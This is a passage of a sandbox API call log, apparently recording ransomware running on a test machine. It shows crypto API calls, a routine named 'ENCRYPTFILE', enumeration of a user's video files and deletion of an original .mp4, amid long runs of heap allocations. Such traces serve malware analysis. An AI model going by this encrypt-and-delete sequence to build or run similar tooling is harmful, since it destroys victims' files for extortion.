hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0101.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0101.812] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0101.813] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0101.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0101.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.814] FreeLibrary (hLibModule=0x756e0000) returned 1 [0101.814] CloseHandle (hObject=0x258) returned 1 [0101.814] CloseHandle (hObject=0x298) returned 1 [0102.063] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4", lpFilePart=0x0) returned 0x55 [0102.064] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\h8kmq6up_q4ir-v.mp4")) returned 0x20 [0102.064] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeecd3cc0, ftCreationTime.dwHighDateTime=0x1d5e0e8, ftLastAccessTime.dwLowDateTime=0x2e368a50, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0x2e368a50, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x15742, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="h8KMQ6UP_q4ir-v.mp4", cAlternateFileName="H8KMQ6~1.MP4")) returned 0x41ac500 [0102.064] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\h8kmq6up_q4ir-v.mp4")) returned 1 [0102.107] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeecd3cc0, ftCreationTime.dwHighDateTime=0x1d5e0e8, ftLastAccessTime.dwLowDateTime=0x2e368a50, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0x2e368a50, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x15742, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="h8KMQ6UP_q4ir-v.mp4", cAlternateFileName="H8KMQ6~1.MP4")) returned 0 [0102.108] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0102.108] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0102.108] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c81d70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2eec7760, ftLastAccessTime.dwHighDateTime=0x1d5ebb3, ftLastWriteTime.dwLowDateTime=0x2eec7760, ftLastWriteTime.dwHighDateTime=0x1d5ebb3, nFileSizeHigh=0x0, nFileSizeLow=0xb6e8, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="IQ0I29Q qVTPWYuVmY.avi", cAlternateFileName="IQ0I29~1.AVI")) returned 0x41ac780 [0102.108] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0102.109] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0102.109] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0102.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0102.110] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2820 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0102.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0102.112] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0102.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.114] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0102.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.115] 